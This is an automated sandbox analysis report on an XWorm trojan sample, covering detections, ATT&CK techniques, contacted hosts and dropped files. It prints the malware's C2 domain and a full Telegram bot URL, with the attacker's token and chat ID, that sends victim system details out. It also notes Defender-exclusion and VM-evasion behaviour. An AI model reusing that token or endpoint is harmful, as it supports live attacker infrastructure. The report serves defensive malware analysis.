                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		1
                Input Capture                		1
                Query Registry                		Remote Services1
                Input Capture                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		11
                Disable or Modify Tools                		LSASS Memory131
                Security Software Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS141
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture1
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Obfuscated Files or Information                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518076 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 28 api.telegram.org 2->28 30 various-wages.gl.at.ply.gg 2->30 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 44 13 other signatures 2->44 8 SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe 4 2->8         started        signatures3 42 Uses the Telegram API (likely for C&C communication) 28->42 process4 file5 26 SecuriteInfo.com.W....5111.21143.exe.log, ASCII 8->26 dropped 46 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->46 48 Adds a directory exclusion to Windows Defender 8->48 12 powershell.exe 23 8->12         started        15 SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe 15 2 8->15         started        18 SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe 8->18         started        signatures6 process7 dnsIp8 50 Loading BitLocker PowerShell Module 12->50 20 WmiPrvSE.exe 12->20         started        22 conhost.exe 12->22         started        32 api.telegram.org 149.154.167.220, 443, 49708 TELEGRAMRU United Kingdom 15->32 34 various-wages.gl.at.ply.gg 147.185.221.22, 49710, 49712, 49713 SALSGIVERUS United States 15->34 24 WerFault.exe 19 16 15->24         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe45%ReversingLabs
                SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://upx.sf.net0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.40%Avira URL Cloudsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP0%Avira URL Cloudsafe
                various-wages.gl.at.ply.gg0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                various-wages.gl.at.ply.gg
                		147.185.221.22
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4true
                    • Avira URL Cloud: safe
                    		unknown
                    various-wages.gl.at.ply.ggtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://upx.sf.netAmcache.hve.13.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePSecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/botSecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUtrue
                    147.185.221.22
                    		various-wages.gl.at.ply.ggUnited States
                    		12087SALSGIVERUStrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1518076
                    Start date and time:2024-09-25 11:30:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@10/11@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 55
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    05:31:02API Interceptor3401367x Sleep call for process: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe modified
                    05:31:04API Interceptor13x Sleep call for process: powershell.exe modified
                    05:33:34API Interceptor1x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        Inquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                  https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                    http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                                      r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        147.185.221.22BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                          jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                            AutoWizard.exeGet hashmaliciousQuasarBrowse
                                              dsadsadsadsadsadsaw.exeGet hashmaliciousQuasarBrowse
                                                killerdude.exeGet hashmaliciousQuasarBrowse
                                                  XyjvIO6D4m.exeGet hashmaliciousXWormBrowse
                                                    vtCneOrnat.exeGet hashmaliciousXWormBrowse
                                                      jbG3cpmy.exeGet hashmaliciousXWormBrowse
                                                        client.exeGet hashmaliciousQuasarBrowse
                                                          file.exeGet hashmaliciousXWormBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            various-wages.gl.at.ply.ggBANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                            • 147.185.221.22
                                                            api.telegram.orgrPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            Inquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUrPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Inquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            http://vhm5d5.shop/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://lender-abang.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            SALSGIVERUS3EtS1ncqvJ.exeGet hashmaliciousNjratBrowse
                                                            • 147.185.221.19
                                                            hfKx2T5IfT.exeGet hashmaliciousNjratBrowse
                                                            • 147.185.221.19
                                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                            • 147.185.221.22
                                                            It8DXmSFEk.exeGet hashmaliciousNjratBrowse
                                                            • 147.185.221.19
                                                            6Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                                                            • 147.185.221.18
                                                            IWsK3V2Ul9.exeGet hashmaliciousArrowRATBrowse
                                                            • 147.185.221.17
                                                            SecuriteInfo.com.FileRepMalware.32767.25187.exeGet hashmaliciousUnknownBrowse
                                                            • 147.185.221.20
                                                            SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exeGet hashmaliciousSheetRatBrowse
                                                            • 147.185.221.17
                                                            jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                                            • 147.185.221.22
                                                            AutoWizard.exeGet hashmaliciousQuasarBrowse
                                                            • 147.185.221.22

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=emailGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1Get hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            MailAttachment.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            Meeting-037-911.oneGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            117532123_20240925-9_MCZB#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 149.154.167.220
                                                            New_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VINQMAKI52OQ5DSR_ac49a6e8e43cdf6b966cd8165e24dd382453b1_3ff4ead9_b9b6324b-4ad3-4219-8fac-93424fd68963\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.3659243392962481
                                                            Encrypted:false
                                                            SSDEEP:192:ZSIMDn0PPDQ+0BU/6a6THyORpsMzuiFZZ24IO8jU:od0PPDCBU/6aWSGsMzuiFZY4IO8j
                                                            MD5:0BB70F8C7BE268DFC77C90D10B4908D1
                                                            SHA1:2B78331E35287F30A1280A649A9A511E450B9664
                                                            SHA-256:94529A6B3DB481F04C6FD0EBCDC17590A755A6FD1922D6CC232B3D5F92E4D8DB
                                                            SHA-512:C0CBCA9D27E8B5B7CE84ED3633BCC8C0F7077FBA79341003DD828E1B49F93DB729A55DC676D689C7C25A36EC893B15156EDF95A00A69F5E19B274F0BAE4625AF
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.3.0.3.9.9.8.5.3.2.5.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.3.0.4.0.1.2.1.2.6.4.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.b.6.3.2.4.b.-.4.a.d.3.-.4.2.1.9.-.8.f.a.c.-.9.3.4.2.4.f.d.6.8.9.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.b.1.6.2.9.3.-.d.1.0.1.-.4.8.9.d.-.9.8.1.2.-.6.4.7.1.8.1.9.1.f.7.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...M.a.l.w.a.r.e.X.-.g.e.n...5.1.1.1...2.1.1.4.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.S.g.G...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.8.-.0.0.0.1.-.0.0.1.4.-.6.c.e.a.-.b.0.a.3.2.d.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.0.8.3.1.a.2.4.a.9.d.5.2.a.3.a.9.a.4.d.d.6.7.0.5.7.c.7.4.5.0.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.8.5.c.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A57.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 09:33:20 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):416255
                                                            Entropy (8bit):3.59525432359997
                                                            Encrypted:false
                                                            SSDEEP:3072:xv8I1MGc4uEq6y6iS//4LTga1khRrADOQWCky+C5uPqJTf5gjNZ7Cg6tPxx:xr1MGc4Ty6iS//uTgm9Dd9gyVuZh6d
                                                            MD5:4E7FF0032DDF37998487F38368449FFB
                                                            SHA1:2DCEA72E35314B6B64C439E32ED0AEE148EAE4C1
                                                            SHA-256:0D110C6E2019C80A03AA81EF626052291FB1F80184136C4B0423D0E5EC780A76
                                                            SHA-512:B3FA436D8EA0E09B92DBBB01FF55092094B00843F1F75569FBF00A86F6F46FDCA9797C43B034BCC02B8F26E734100A44AA2A0D8042AA81E11BB576D5EDA75503
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP..a..... ..........f.........................(..........<....3.......3..0~..........`.......8...........T............l../............4...........5..............................................................................eJ.......6......GenuineIntel............T...........W..f....7........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDD.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6502
                                                            Entropy (8bit):3.7312266623534045
                                                            Encrypted:false
                                                            SSDEEP:96:RSIU6o7wVetbGN6TufOYZNvQE/nHi65aM4Uf89bi/sfVx2m:R6l7wVeJGN6TeOYZ1lprf89bi/sfVx2m
                                                            MD5:6D52D795DF7038F28C85309F3E9D4687
                                                            SHA1:CD990976DF4FA312A85C258C9F5C2F6AEFFDF48A
                                                            SHA-256:2B28631682506907A5CAA4346C06B0A5024585B37A4B194FCB4121E02EDDA504
                                                            SHA-512:028C786FA1D8240347AF15FCD5AC10CC90D646272F8D180E1F81B73025E74C0AF59D34AE4AB35AA472D60EFC033F0B5A9CBF2A6681A8D34C4117176F0B72CB8B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F0C.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4879
                                                            Entropy (8bit):4.555105221405162
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsNJg77aI9BryWpW8VYj3PYm8M4J4pUF3y+q8vdpLxt8P7Hhd:uIjfnI7fX7ViSJEKZI7Hhd
                                                            MD5:F5E3164DF46AD4B748AB657EAC6E5B0E
                                                            SHA1:0B93EC341F70DA459EA17CF7576FCB3A4E2E05F9
                                                            SHA-256:A5D4E3F65E992F4030207B4028ADFAA83417C809E8D4BD0423D94468F1DD6AB6
                                                            SHA-512:115B7A5BD3E0B327CF4C229E9567BE349F58188ECC12A6FBB4BA6B0621CEEFD6AFD9733400AB8B338C38F8F9C710EAFF9C5E79E5B3B11338464FFE8063825F03
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515556" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
